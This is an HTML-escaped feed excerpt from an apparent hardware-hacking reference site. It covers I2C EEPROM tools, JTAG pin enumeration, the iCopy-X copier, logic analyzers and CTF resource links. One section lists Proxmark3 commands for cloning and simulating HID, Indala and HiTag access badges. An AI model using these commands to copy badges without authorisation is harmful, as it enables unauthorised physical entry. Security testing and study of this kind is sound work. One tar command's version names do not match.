&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;tar&lt;/span&gt; &lt;span class="n"&gt;-xvf&lt;/span&gt; &lt;span class="n"&gt;eeprog&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;0.7&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="mf"&gt;6&lt;/span&gt;&lt;span class="n"&gt;-tear5&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;tar&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;gz&lt;/span&gt; &lt;span class="n"&gt;eeprog&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;0.7&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="mf"&gt;6&lt;/span&gt;&lt;span class="n"&gt;-tear12&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;cd &lt;/span&gt;&lt;span class="n"&gt;eeprog&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;0.7&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="mf"&gt;6&lt;/span&gt;&lt;span class="n"&gt;-tear12&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;make&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sudo&lt;/span&gt; &lt;span class="n"&gt;make&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;HydraBus&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;i2c1&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;show&lt;/span&gt; &lt;span class="n"&gt;pins&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;i2c1&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;scan&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="read--write" class="anchored-heading"&gt;Read / Write&lt;a class="heading-anchor" href="#read--write" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Read: &lt;code&gt;./eeprog -x /dev/i2c-1 0x50 -16 -r 0x00:0x10&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Write: &lt;code&gt;echo &amp;quot;hello&amp;quot; | ./eeprog -f -16 -w 0 -t 5 /dev/i2c-1 0x50&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="references" class="anchored-heading"&gt;References&lt;a class="heading-anchor" href="#references" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://learn.adafruit.com/scanning-i2c-addresses/raspberry-pi"&gt;How to Scan and Detect I2C Addresses - Carter Nelson&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>iCopy-X</title><link>https://bokkapig.pages.dev/refs/hardware/gadgets/icopy-x/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/gadgets/icopy-x/</guid><description>&lt;p&gt;iCopy-X is a &amp;ldquo;super&amp;rdquo; automated handheld RFID copier based on Proxmark3. iCopy-X can read, crack, duplicate, sniff and simulate without the use of a PC.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/iCopy-X-Community"&gt;iCopy-X-Community&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/iCopy-X-Community/icopyx-upstream"&gt;iCopy-X-Community/icopyx-upstream&lt;/a&gt; - Collecting elements provided by the manufacturer&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/iCopy-X-Community/icopyx-community-pm3"&gt;iCopy-X-Community/icopyx-community-pm3&lt;/a&gt; - Scrap repo for various tests&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/iCopy-X-Community/icopyx-teardown"&gt;iCopy-X-Community/icopyx-teardown&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="update" class="anchored-heading"&gt;Update&lt;a class="heading-anchor" href="#update" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Latest firmware: &lt;code&gt;1.0.90 2022-08-16&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://icopy-x.com/otasys/index.php"&gt;icopy-x.com/otasys&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Step 1&lt;/strong&gt;: Enter the device S/N (found under the “About” menu) on the website and download the upgrade package to your PC.&lt;/p&gt;</description></item><item><title>JTAG</title><link>https://bokkapig.pages.dev/refs/hardware/debug-interfaces/jtag/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/debug-interfaces/jtag/</guid><description>&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;JTAG Pins&lt;/li&gt;
&lt;li&gt;JTAGEnum&lt;/li&gt;
&lt;li&gt;References&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="jtag-pins" class="anchored-heading"&gt;JTAG Pins&lt;a class="heading-anchor" href="#jtag-pins" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;Allows testing, debugging, firmware manipulation and boundary scanning&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;TCK: Test Clock&lt;/strong&gt; The drummer, or metronome that dictates the speed of the TAP controller. Voltage on this pin simply pulses up and down in a rhythmic, steady beat. On every “beat” of the clock, the TAP controller takes a single action. The actual clock speed is not specified in the JTAG standard. The TAP controller accepts its speed from the outside device controlling JTAG.&lt;/p&gt;</description></item><item><title>JTAG</title><link>https://bokkapig.pages.dev/refs/hardware/enumeration/jtag/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/enumeration/jtag/</guid><description>&lt;p&gt;Sometimes when you have no idea what&amp;rsquo;s the pinout of the JTAG port, you have to find a way to correctly identify each of the JTAG pins. There are few ways to do that, one of them is by &amp;ldquo;bruteforcing&amp;rdquo; the pins for &lt;code&gt;IDCODE&lt;/code&gt; or &lt;code&gt;BYPASS&lt;/code&gt; JTAG commands.&lt;/p&gt;
&lt;p&gt;There are several tools and ways to enumerate JTAG pins. Here are few:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Probing pin voltage, resistence to VCC and GND (TODO)&lt;/li&gt;
&lt;li&gt;Searching with Joe Grand&amp;rsquo;s JTAGulator (TODO)&lt;/li&gt;
&lt;li&gt;&lt;a href="#jtagenum-with-arduino-or-raspberry-pi"&gt;Using an Arduino Pro Micro&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#searching-jtag-pins-with-raspberry-pi-pico"&gt;Using an Raspberry Pi Pico&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="searching-jtag-pins-with-raspberry-pi-pico" class="anchored-heading"&gt;Searching JTAG pins with Raspberry PI Pico&lt;a class="heading-anchor" href="#searching-jtag-pins-with-raspberry-pi-pico" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Raspberry Pi Pico: &lt;a href="https://github.com/racerxdl/JTAGscan"&gt;https://github.com/racerxdl/JTAGscan&lt;/a&gt; made by &lt;a href="https://github.com/szymonh/"&gt;szymonh&lt;/a&gt; adapted to RP2040 by &lt;a href="https://github.com/racerxdl/JTAGscan"&gt;racerxdl&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="how-does-it-work" class="anchored-heading"&gt;How does it work?&lt;a class="heading-anchor" href="#how-does-it-work" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;p&gt;JTAGscan iterates over all defined pins (currently for RP2040, the first 16 pins) searching for TMS, TCK, TDO and TDI.&lt;/p&gt;</description></item><item><title>LF - HID &amp; Indala</title><link>https://bokkapig.pages.dev/refs/hardware/protocols/rfid-nfc/lf-hid-indala/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/protocols/rfid-nfc/lf-hid-indala/</guid><description>&lt;h2 id="hid--indala" class="anchored-heading"&gt;HID &amp;amp; Indala&lt;a class="heading-anchor" href="#hid--indala" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;Cloning requires writable T55xx card. The T55x7 card can be configured to emulate many of the 125 kHz tags.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;lf&lt;/span&gt; &lt;span class="n"&gt;search&lt;/span&gt; &lt;span class="c"&gt;# HID Prox TAG ID: 2004263f88&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;lf&lt;/span&gt; &lt;span class="n"&gt;hid&lt;/span&gt; &lt;span class="n"&gt;fskdemod&lt;/span&gt; &lt;span class="c"&gt;# (Push the button on the PM3 to stop scanning - not necessary)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;lf&lt;/span&gt; &lt;span class="n"&gt;hid&lt;/span&gt; &lt;span class="n"&gt;demod&lt;/span&gt; &lt;span class="c"&gt;# (Push the button on the PM3 to stop scanning - not necessary)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;lf&lt;/span&gt; &lt;span class="n"&gt;hid&lt;/span&gt; &lt;span class="n"&gt;clone&lt;/span&gt; &lt;span class="n"&gt;2004263f88&lt;/span&gt; &lt;span class="c"&gt;# (id à cloner)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;lf&lt;/span&gt; &lt;span class="n"&gt;hid&lt;/span&gt; &lt;span class="n"&gt;sim&lt;/span&gt; &lt;span class="mf"&gt;200671012d&lt;/span&gt; &lt;span class="c"&gt;# simulate HID card with UID=200671012d&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;lf&lt;/span&gt; &lt;span class="n"&gt;indala&lt;/span&gt; &lt;span class="n"&gt;read&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;lf&lt;/span&gt; &lt;span class="n"&gt;indala&lt;/span&gt; &lt;span class="n"&gt;demod&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;lf&lt;/span&gt; &lt;span class="n"&gt;indala&lt;/span&gt; &lt;span class="n"&gt;sim&lt;/span&gt; &lt;span class="n"&gt;a0000000c2c436c1&lt;/span&gt; &lt;span class="c"&gt;# simulate Indala with UID=a0000000c2c436c1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;lf&lt;/span&gt; &lt;span class="n"&gt;indala&lt;/span&gt; &lt;span class="n"&gt;clone&lt;/span&gt; &lt;span class="n"&gt;a0000000c2c436c1&lt;/span&gt; &lt;span class="c"&gt;# clone Indala to T55x7 card&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;lf&lt;/span&gt; &lt;span class="n"&gt;hitag&lt;/span&gt; &lt;span class="n"&gt;info&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;lf&lt;/span&gt; &lt;span class="n"&gt;hitag&lt;/span&gt; &lt;span class="n"&gt;sim&lt;/span&gt; &lt;span class="n"&gt;c378181c_a8f7&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;ht2&lt;/span&gt; &lt;span class="c"&gt;# simulate HiTag&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="lf---em410x" class="anchored-heading"&gt;LF - EM410X&lt;a class="heading-anchor" href="#lf---em410x" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Read only memory :/&lt;/p&gt;</description></item><item><title>Links &amp; Hardware Kits</title><link>https://bokkapig.pages.dev/refs/hardware/other/links-and-hardware-kits/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/other/links-and-hardware-kits/</guid><description>&lt;h2 id="hardware-challenges--ctf" class="anchored-heading"&gt;Hardware Challenges &amp;amp; CTF&lt;a class="heading-anchor" href="#hardware-challenges--ctf" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/hackgnar/ble_ctf"&gt;BLE CTF&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://www.hackgnar.com/2018/06/learning-bluetooth-hackery-with-ble-ctf.html"&gt;Learning Bluetooth Hackery with BLE CTF&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://blog.tclaverie.eu/posts/bluetooth-low-energy-ctf---write-up"&gt;BLUETOOTH LOW ENERGY CTF - WRITE UP ECLECTIC KOALA&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.pentestpartners.com/security-blog/totally-pwning-the-tapplock-smart-lock/"&gt;https://www.pentestpartners.com/security-blog/totally-pwning-the-tapplock-smart-lock/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/Vulcainreo/DVID"&gt;Damn Vulnerable IoT Device&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/DVID/"&gt;DVID - Damn Vulnerable IoT Device Challenges&amp;rsquo; writeup&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.triplesec.info/slides/b4ed465329250481e92c97574cd6b3b4.pdf"&gt;IoT Security - Hack the Damn : Vulnerable IoT Device - Arnaud COURTY - @vulcainreo&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://blog.ghozt.ninja/2019/07/19/findthedatasheet/"&gt;findTheDatasheet - EN&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://shoxxdj.fr/dvid-hardware-find-the-datasheet/"&gt;findTheDatasheet - FR&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://shoxxdj.fr/dvid-firmware-defaultpassword/"&gt;defaultPassword - FR&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=C1vQGfzPWuY"&gt;GreHack 2019: IOT Security: Hack The Damn Vulnerable IoT Device - Arnaud Courty&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/Riscure/Rhme-2017"&gt;Riscure CTF 3 (2017)&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=zk3JdMOQPc8&amp;amp;list=PLhixgUqwRTjwNaT40TqIIagv3b4_bfB7M&amp;amp;index=5"&gt;Solving AVR reverse engineering challenge with radare2 - rhme2 Jumpy (reversing 100)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=TM-cuV9Nd1E&amp;amp;list=PLhixgUqwRTjwNaT40TqIIagv3b4_bfB7M&amp;amp;index=2"&gt;Using UART / Serial to interact with an embedded device - rhme2 Setup&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=6QQ4kgDWQ9w&amp;amp;list=PLhixgUqwRTjwNaT40TqIIagv3b4_bfB7M&amp;amp;index=3"&gt;SHA1 length extension attack on the Secure Filesystem - rhme2 Secure Filesystem (crypto 100)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=D0VKuZuuvW8&amp;amp;list=PLhixgUqwRTjwNaT40TqIIagv3b4_bfB7M&amp;amp;index=4"&gt;Start reverse engineering AVR - Memory Map and I/O Registers - rhme2 Reverse Engineering&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=01EX0mjya5A&amp;amp;list=PLhixgUqwRTjwNaT40TqIIagv3b4_bfB7M&amp;amp;index=6"&gt;Defeat a stack cookie with bruteforce - rhme2 Photo manager (pwn 100)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=fRgNtGXDMlY&amp;amp;list=PLhixgUqwRTjwNaT40TqIIagv3b4_bfB7M&amp;amp;index=8"&gt;Format string exploit on an arduino - rhme2 Casino (pwn 150)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=hyoPAOTrUMc&amp;amp;list=PLhixgUqwRTjwNaT40TqIIagv3b4_bfB7M&amp;amp;index=23"&gt;Identifying UART and main() in an AVR firmware (ft. Zeta Two) part 1 - rhme2&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/Riscure/Rhme-2016"&gt;Riscure CTF 2 (2016)&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://youtu.be/FI4serDzE4w"&gt;riscure embedded hardware CTF is over - loopback 0x03 - LiveOverflow - 3 march 2017&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/hydrabus/rhme-2016"&gt;rhme-2016 write-up Team HydraBus&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/Riscure/RHme-2015"&gt;Riscure CTF 1 (2015)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://gist.github.com/nstarke/ed0aba2c882b8b3078747a567ee00520"&gt;Reversing Raw Binary Firmware Files in Ghidra&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://thanat0s.trollprod.org/2014/01/dumper-un-arduino/"&gt;Dumper un Arduino - thanatos&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://blog.isecurion.com/2017/07/06/dumping-the-firmware-from-the-device-using-buspirate/"&gt;Dumping the Firmware from the device Using buspirate - Veera Babu&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.pentesteracademy.com/course?id=37"&gt;Embedded/IoT Linux for Red-Blue Teams&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://hackinparis.com/data/slides/2018/talks/HIP2018_Damien_Cauquil_From_Printed_Circuit_Boards_To_Exploits.pdf"&gt;From printed circuits boards to exploits (PWNING IOT DEVICES LIKE A BOSS) @virtualabs | Hack in Paris &amp;lsquo;18-&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="twitch--streaming" class="anchored-heading"&gt;Twitch &amp;amp; Streaming&lt;a class="heading-anchor" href="#twitch--streaming" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.twitch.tv/virtualabs"&gt;Twitch - virtualabs&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/@VirtuVOD"&gt;Youtube - VirtuVOD - VOD of twitch.tv/virtualabs&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/@whid_ninja"&gt;Youtube - WHID We Hack In Disguise&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="books" class="anchored-heading"&gt;Books&lt;a class="heading-anchor" href="#books" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.amazon.ca/Penetration-Testing-Cookbook-Aaron-Guzman/dp/1787280578"&gt;IoT Penetration Testing Cookbook: Identify vulnerabilities and secure your smart devices - Aaron Guzman, Aditya Gupta - Nov. 29 2017&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.amazon.ca/IoT-Hackers-Handbook-Practical-Internet/dp/1484242998"&gt;The IoT Hacker&amp;rsquo;s Handbook: A Practical Guide to Hacking the Internet of Things - Aditya Gupta - April 1 2019&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.amazon.ca/Practical-IoT-Hacking-Fotios-Chantzis-ebook/dp/B085BVVSN6"&gt;Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things - Fotios Chantzis, Ioannis Stais, Paulino Calderon, Evangelos Deirmentzoglou, Beau Woods&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.amazon.ca/Advanced-Penetration-Testing-Hacking-IoT/dp/1092533591"&gt;Advanced Penetration Testing Hacking IoT - Richard Knowell - April 2 2019&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="hardware-kits" class="anchored-heading"&gt;Hardware Kits&lt;a class="heading-anchor" href="#hardware-kits" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;&lt;img src="https://i.ibb.co/WW55LH4/Hardware-Toolkit.jpg" alt="HW1" loading="lazy" decoding="async"&gt;
&lt;img src="https://i.ibb.co/F3vRmgV/Hardware-Toolkit2.jpg" alt="HW2" loading="lazy" decoding="async"&gt;
&lt;img src="https://github.com/Vulcainreo/DVID/raw/master/kit-contents.jpg" alt="DVID1" loading="lazy" decoding="async"&gt;
&lt;img src="https://pbs.twimg.com/media/ELVWNyKWwAAPa0T?format=jpg&amp;name=900x900" alt="Ph0wn Basic" loading="lazy" decoding="async"&gt;
&lt;img src="https://pbs.twimg.com/media/F7BYpl1WcAAmWmM?format=jpg&amp;name=large" alt="WHID Offensive Hardware Security Training" loading="lazy" decoding="async"&gt;&lt;/p&gt;</description></item><item><title>Logic Analyzer</title><link>https://bokkapig.pages.dev/refs/hardware/gadgets/logic-analyzer/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/gadgets/logic-analyzer/</guid><description>&lt;h2 id="sigrok--pulseview" class="anchored-heading"&gt;Sigrok / Pulseview&lt;a class="heading-anchor" href="#sigrok--pulseview" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://sigrok.org/wiki/Downloads"&gt;Sigrok wiki &amp;gt; Downloads&lt;/a&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sigrok&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="nb"&gt;kali-rolling&lt;/span&gt; &lt;span class="mf"&gt;0.3&lt;/span&gt; &lt;span class="n"&gt;all&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;Logic&lt;/span&gt; &lt;span class="n"&gt;analyzer&lt;/span&gt; &lt;span class="n"&gt;and&lt;/span&gt; &lt;span class="n"&gt;protocol&lt;/span&gt; &lt;span class="n"&gt;decoder&lt;/span&gt; &lt;span class="n"&gt;software&lt;/span&gt; &lt;span class="n"&gt;suite&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;metapackage&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;pulseview&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="nb"&gt;kali-rolling&lt;/span&gt; &lt;span class="mf"&gt;0.4&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="mf"&gt;2&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;3&lt;/span&gt;&lt;span class="p"&gt;+&lt;/span&gt;&lt;span class="n"&gt;b1&lt;/span&gt; &lt;span class="n"&gt;amd64&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sigrok&lt;/span&gt; &lt;span class="n"&gt;logic&lt;/span&gt; &lt;span class="n"&gt;analyzer&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;oscilloscope&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;and&lt;/span&gt; &lt;span class="n"&gt;MSO&lt;/span&gt; &lt;span class="n"&gt;GUI&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="saleae" class="anchored-heading"&gt;Saleae&lt;a class="heading-anchor" href="#saleae" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://support.saleae.com/logic-software/sw-download"&gt;Logic 2 Software&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="interact" class="anchored-heading"&gt;Interact&lt;a class="heading-anchor" href="#interact" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;screen&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;dev&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;ttyUSB0&lt;/span&gt; &lt;span class="mf"&gt;19200&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="references" class="anchored-heading"&gt;References&lt;a class="heading-anchor" href="#references" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://hackaday.com/2023/08/31/logic-analyzers-tapping-into-raspberry-pi-secrets/"&gt;LOGIC ANALYZERS: TAPPING INTO RASPBERRY PI SECRETS - Arya Voronova - August 31, 2023&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://hackaday.com/2023/09/12/logic-analyzers-capabilities-and-limitations/"&gt;LOGIC ANALYZERS: CAPABILITIES AND LIMITATIONS - Arya Voronova - September 12, 2023&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>LoRa - LoRaWAN</title><link>https://bokkapig.pages.dev/refs/hardware/protocols/lora/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/protocols/lora/</guid><description>&lt;h2 id="lora-with-arduino-on-8681mhz" class="anchored-heading"&gt;LoRa with Arduino on 868.1MHZ&lt;a class="heading-anchor" href="#lora-with-arduino-on-8681mhz" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
